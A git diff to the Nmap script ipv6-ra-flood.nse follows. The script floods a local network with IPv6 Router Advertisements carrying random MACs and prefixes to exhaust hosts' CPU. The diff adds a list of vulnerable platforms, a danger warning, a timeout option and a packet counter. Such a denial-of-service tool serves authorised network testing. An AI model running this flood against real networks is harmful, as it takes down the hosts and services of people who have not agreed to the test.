diff --git a/ipv6-ra-flood.nse b/ipv6-ra-flood.nse index 13f82b3..aa3b8c6 100644 --- a/ipv6-ra-flood.nse +++ b/ipv6-ra-flood.nse @@ -5,16 +5,35 @@ local math = require "math" local string = require "string" local os = require "os" -description = [[ Generates a flood of Router Adverisments (RA) with randomized source MAC address and annouced IPv6 prefixes causing machines to be DoSed. +description = [[ Generates a flood of Router Adverisments (RA) with random source MAC addresses and IPv6 prefixes. Computers, which have stateless autoconfiguration enabled by default (every major OS), +will start to compute IPv6 suffix and update their routing table to reflect the accepted annoucement. This will cause 100% CPU usage, thus preventing to process other application requests. + +Vulnerable platforms: + * All Cisco IOS ASA with firmware < November 2010 + * All Netscreen versions supporting IPv6 + * Windows 2000/XP/2003/Vista/7/2008/8/2012 + * All FreeBSD versions + * All NetBSD versions + * All Solaris/Illumos versions + +Security advisory: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt + +WARNING: This script is dangerous and is very likely to bring down a server or network appliance. +It should not be run in a production environment unless you (and, more importantly, +the business) understand the risks! + +Additional documents: https://tools.ietf.org/rfc/rfc6104.txt ]] --- -- @args -- ipv6-ra-flood.interface defines interface we should broadcast on +-- ipv6-ra-flood.timeout runs the script until the timeout (in seconds) is reached (default: 30s). If timeout is zero, the script will run forever. -- -- @usage -- nmap -6 --script ipv6-ra-flood.nse -- nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=' +-- nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=,timeout=10' -- -- @output -- n/a @@ -49,7 +68,7 @@ end local function get_interface() local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. ".interface") - local if_table = try(nmap.get_interface_info(arg_interface)) + local if_table = nmap.get_interface_info(arg_interface) if if_table and packet.ip6tobin(if_table.address) and if_table.link == "ethernet" then return if_table.device @@ -111,7 +130,12 @@ end --- Broadcasting on the selected interface -- @param iface table containing interface information local function broadcast_on_interface(iface) - stdnse.print_verbose("Starting " .. SCRIPT_NAME .. " on interface" .. iface) + stdnse.print_verbose("Starting " .. SCRIPT_NAME .. " on interface " .. iface) + + -- packet counter + local counter = 0 + + local arg_timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME..".timeout")) or 30 local dnet = nmap.new_dnet() @@ -128,6 +152,8 @@ local function broadcast_on_interface(iface) local mtu = 1500 + local start, stop = os.time() + while true do local src_mac = packet.mactobin(random_mac()) @@ -148,6 +174,17 @@ local function broadcast_on_interface(iface) packet:build_ether_frame() try(dnet:ethernet_send(packet.frame_buf)) + + counter = counter + 1 + + if arg_timeout and arg_timeout > 0 and arg_timeout <= os.time() - start then + stop = os.time() + break + end + end + + if counter > 0 then + stdnse.print_debug("%s generated %d packets in %d seconds.", SCRIPT_NAME, counter, stop - start) end end